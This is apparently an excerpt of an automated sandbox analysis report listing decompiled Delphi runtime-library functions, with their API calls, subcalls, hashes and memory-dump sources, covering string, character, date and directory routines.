                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$From$AnsiStr$qqrr20Stringx20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20Cat$qqrr20Cat3$qqrr20Char$qqrr20Copy$qqrx20DupeStr$qqriString$qqrx20StringbStringiStringiiStringt2Strutils@Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2114788560-0
                                                                                                  • Opcode ID: b7fb9b28b5c2121679e22dd6f35be3f677741a1e7c790f700155013dc50960c1
                                                                                                  • Instruction ID: 16ea5a0d39597b1b2e5b354b4af76d672fd4379d434ada6c456a148815a4d04d
                                                                                                  • Opcode Fuzzy Hash: b7fb9b28b5c2121679e22dd6f35be3f677741a1e7c790f700155013dc50960c1
                                                                                                  • Instruction Fuzzy Hash: DD514770A012998FDF00CFA9DD919AEB7F5FF49214B60466AE500E7395DB34EE81CB90
                                                                                                  Function 50010DD0 Relevance: 19.6, APIs: 13, Instructions: 116COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010F1B), ref: 50010DFE
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010F1B), ref: 50010E1B
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010F1B), ref: 50010E53
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50010F1B), ref: 50010E84
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50010F1B), ref: 50010E89
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010F1B), ref: 50010EA6
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,50010F1B), ref: 50010EB2
                                                                                                  • @Character@TCharacter@GetUnicodeCategory$qqrx20System@UnicodeStringi.RTL120(00000000,50010F1B), ref: 50010EC0
                                                                                                  • @Character@TCharacter@CheckNumber$qqr26Character@TUnicodeCategory.RTL120(00000000,50010F1B), ref: 50010EC5
                                                                                                  • @Character@TCharacter@IsAscii$qqrb.RTL120(00000000,50010F1B), ref: 50010ED0
                                                                                                  • @Character@TCharacter@CheckNumber$qqr26Character@TUnicodeCategory.RTL120(00000000,50010F1B), ref: 50010EE5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Character@$Unicode$System@$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$CategoryCheckNumber$qqr26$Ascii$qqrbAsg$qqrr20Category$qqrx20Except$qqrvException@$bctr$qqrp20Latin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3637202406-0
                                                                                                  • Opcode ID: 751393710e930eb27405fe4e3e94953a572777632971053491e119f22829623a
                                                                                                  • Instruction ID: f3a2b83f937e7c586b9c85763bdedaf6e99525fe08e3eea42222651124a940af
                                                                                                  • Opcode Fuzzy Hash: 751393710e930eb27405fe4e3e94953a572777632971053491e119f22829623a
                                                                                                  • Instruction Fuzzy Hash: CF41F230A001899BDF11DFA5EC925AEB7F5AF04300F904AB6E580E7242D7B09E82D790
                                                                                                  Function 5001BDBC Relevance: 19.6, APIs: 13, Instructions: 90COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BDF4
                                                                                                    • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                    • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                    • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE04
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@ExcludeTrailingPathDelimiter$qqrx20System@UnicodeString.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE0F
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE1A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE37
                                                                                                  • @Sysutils@DirectoryExists$qqrx20System@UnicodeString.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE51
                                                                                                    • Part of subcall function 5001BD98: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000001,5001BE56,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BD9D
                                                                                                    • Part of subcall function 5001BD98: GetFileAttributesW.KERNEL32(00000000,00000001,5001BE56,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BDA3
                                                                                                  • @Sysutils@ExtractFilePath$qqrx20System@UnicodeString.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE64
                                                                                                    • Part of subcall function 5001C610: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C61E
                                                                                                    • Part of subcall function 5001C610: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C62F
                                                                                                  • @System@@UStrEqual$qqrv.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE6F
                                                                                                    • Part of subcall function 5000A45C: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000), ref: 5000A3B7
                                                                                                    • Part of subcall function 5000A45C: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000), ref: 5000A3CC
                                                                                                    • Part of subcall function 5000A45C: @System@@LStrArrayClr$qqrpvi.RTL120(00000000,00000000), ref: 5000A44F
                                                                                                  • @Sysutils@ExtractFilePath$qqrx20System@UnicodeString.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE81
                                                                                                  • @Sysutils@ForceDirectories$qqr20System@UnicodeString.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE89
                                                                                                  • @Sysutils@CreateDir$qqrx20System@UnicodeString.RTL120(00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001BE95
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$String$System@@$Sysutils@$AnsiFileFromStr$qqrr20Stringx27System@%T$us$i0$%$Delimiter$qqrx20ExtractPath$qqrx20Raise$AfterArrayAsg$qqrr20AttributesChar$qqrx20ClassClassoClr$qqrpviConstruction$qqrp14Copy$qqrx20CreateCreate$qqrp17Dir$qqrx20Directories$qqr20DirectoryEqual$qqrvError$qqrucExcept$qqrvException@$bctr$qqrp20ExcludeExists$qqrx20ForceInternalLastList$qqrvLoadMetaObjectPathString$qqrp20StringiiStringt1Stringx20Trailing
                                                                                                  • String ID:
                                                                                                  • API String ID: 2306203679-0
                                                                                                  • Opcode ID: 56a2d1a22aa08b1fbeaa17cbbf80d16e66359434df9b90dacc96891ee287758f
                                                                                                  • Instruction ID: 50c6019c4f89038e0e7c76c75c5a4f51b8fbce8d55c1420a97c27fa388cfb9c6
                                                                                                  • Opcode Fuzzy Hash: 56a2d1a22aa08b1fbeaa17cbbf80d16e66359434df9b90dacc96891ee287758f
                                                                                                  • Instruction Fuzzy Hash: 2531D534A01289DFDF04EFA4ED829DDB3F4EF94200F6046A6E60097212D770EE85DB80
                                                                                                  Function 50023838 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023929), ref: 5002385E
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023929), ref: 50023891
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023929), ref: 500238A0
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000200,00000000,50023929), ref: 500238B4
                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,50023929), ref: 500238C0
                                                                                                  • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,50023929), ref: 500238C6
                                                                                                  • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023929), ref: 500238DC
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000004,?,00000000,?,00000200,00000000,50023929), ref: 5002390E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$Asg$qqrr20Stringx20$Array$qqrr20Char$qqrx20Copy$qqrx20DateFormatFromLocaleStringiiStringpbiThread
                                                                                                  • String ID: $yyyy
                                                                                                  • API String ID: 1172944777-404527807
                                                                                                  • Opcode ID: 88830cba35c6eddecc1ac2c1449b220e654a0ef3beac0e7d82714beb81f21552
                                                                                                  • Instruction ID: 71332474c6b87554fb3030c3449044ef5b0949cbd634da679827f02ba86c845d
                                                                                                  • Opcode Fuzzy Hash: 88830cba35c6eddecc1ac2c1449b220e654a0ef3beac0e7d82714beb81f21552
                                                                                                  • Instruction Fuzzy Hash: 1521D634A066999FEF24DF94D891AAEB3F8EF19300F4041A6F948E7251D7709E40C7E1
                                                                                                  Function 50022B80 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50022C71), ref: 50022BA6
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50022C71), ref: 50022BD9
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50022C71), ref: 50022BE8
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000100,00000000,50022C71), ref: 50022BFC
                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,50022C71), ref: 50022C08
                                                                                                  • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,50022C71), ref: 50022C0E
                                                                                                  • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022C71), ref: 50022C24
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000004,?,00000000,?,00000100,00000000,50022C71), ref: 50022C56
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$Asg$qqrr20Stringx20$Array$qqrr20Char$qqrx20Copy$qqrx20DateFormatFromLocaleStringiiStringpbiThread
                                                                                                  • String ID: $yyyy
                                                                                                  • API String ID: 1172944777-404527807
                                                                                                  • Opcode ID: 7ef1087f4d4af34cec82ccebe09d2b5c760a2d6a66edd987d5132df130b4dd83
                                                                                                  • Instruction ID: 6e21ac3d6df65d55f339e6910fdd066f09115e269f720ce5f53e5c818f6ba049
                                                                                                  • Opcode Fuzzy Hash: 7ef1087f4d4af34cec82ccebe09d2b5c760a2d6a66edd987d5132df130b4dd83
                                                                                                  • Instruction Fuzzy Hash: 4421A635A02599ABDB05DFE4D8919AEB3F8EF18300F9142A6F908E7251D7309E41C7E1
                                                                                                  Function 5000BBB4 Relevance: 18.3, APIs: 12, Instructions: 295COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5000BF16), ref: 5000BC02
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000BF16), ref: 5000BC2B
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000BF16), ref: 5000BC7F
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000BF16), ref: 5000BD60
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000BF16), ref: 5000BEDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$StringSystem@System@@$AnsiFromInternalStr$qqrr20Stringx27System@%T$us$i0$%$EnsureString$qqrr20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2573053487-0
                                                                                                  • Opcode ID: 97667f7b19627494281d573ce0d46fa2221eafa0171f85fe3d9223722af12486
                                                                                                  • Instruction ID: 59446d4d2ba1da7a5ff25cac286c0d0f07febfb8898b249f3869d09b78310809
                                                                                                  • Opcode Fuzzy Hash: 97667f7b19627494281d573ce0d46fa2221eafa0171f85fe3d9223722af12486
                                                                                                  • Instruction Fuzzy Hash: 3CB18D30D0419ADBEB20EFA8C861BEEB3F5EF40314F908666D50197295E7B48E85DB81
                                                                                                  Function 500107B0 Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001092F,?,?), ref: 500107DE
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 500107FB
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 50010833
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,5000FDAE,00000000,5001092F,?,?), ref: 50010864
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,5000FDAE,00000000,5001092F,?,?), ref: 50010869
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 50010886
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120(00000000,5001092F,?,?), ref: 50010892
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001092F,?,?), ref: 500108B3
                                                                                                  • @Character@TCharacter@ConvertToUtf32$qqrx20System@UnicodeStringi.RTL120(00000000,5001092F,?,?), ref: 500108CB
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120(00000000,5001092F,?,?), ref: 500108DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$StringSystem@@$Character@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Asg$qqrr20ConvertExcept$qqrvException@$bctr$qqrp20Initialize$qqrvLatin1$qqrbRaiseRecpx14RecxiStringiStringx20Sysutils@Utf32$qqrx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 1571831625-0
                                                                                                  • Opcode ID: 85393cb161c1816bc41922dd3de2d3b0f49e4e06d07e37d77665b878cc553ffb
                                                                                                  • Instruction ID: db5d648a61a0c398fe2207ce4aef69e534902f808f4f142b5e1ae4a32dae8c69
                                                                                                  • Opcode Fuzzy Hash: 85393cb161c1816bc41922dd3de2d3b0f49e4e06d07e37d77665b878cc553ffb
                                                                                                  • Instruction Fuzzy Hash: AF41B230A042899FEB10DFA4DC915AEB7F5EF44300F5042A6E581D7256DBB4DE85D7D0
                                                                                                  Function 5001AB98 Relevance: 18.1, APIs: 12, Instructions: 123COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,?,?,5001AD11,00000000,5001ADED), ref: 5001ABA9
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120 ref: 5001ABD0
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120 ref: 5001ABEB
                                                                                                  • @Sysutils@StrEnd$qqrpxb.RTL120 ref: 5001ABFE
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5001AC30
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5001AC41
                                                                                                    • Part of subcall function 5000A0CC: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                    • Part of subcall function 5000A0CC: @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                    • Part of subcall function 5000A0CC: @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120 ref: 5001AC4B
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120 ref: 5001AC56
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5001AC7C
                                                                                                  • @Sysutils@AnsiStrScan$qqrpbb.RTL120 ref: 5001AC99
                                                                                                  • @Sysutils@StrEnd$qqrpxb.RTL120 ref: 5001ACAC
                                                                                                  • @System@Move$qqrpxvpvi.RTL120 ref: 5001ACC7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$Sysutils@Unicode$Ansi$Scan$qqrpbb$String$End$qqrpxbFromMove$qqrpxvpvi$Asg$qqrr20CharChar$qqrx20Clr$qqrpvLen$qqrr20Length$qqrr20Mem$qqrrpviReallocStr$qqrr20StringiStringpbiStringx20Stringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 392231086-0
                                                                                                  • Opcode ID: 34e386615c20764c686fa2e330a007194eeb9ffd2f6092f69671aca0717def4e
                                                                                                  • Instruction ID: 272aa0e68da5d34f8c7963d109c1e33d6c47abc84314b6cdbc7e838049ef833e
                                                                                                  • Opcode Fuzzy Hash: 34e386615c20764c686fa2e330a007194eeb9ffd2f6092f69671aca0717def4e
                                                                                                  • Instruction Fuzzy Hash: 1C4178757056B48FDB269F68DC9075973E1EB97320F4046A5E040CF35AEB35AC82CB86
                                                                                                  Function 5001155C Relevance: 18.1, APIs: 12, Instructions: 104COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50011688), ref: 5001158A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50011688), ref: 500115A7
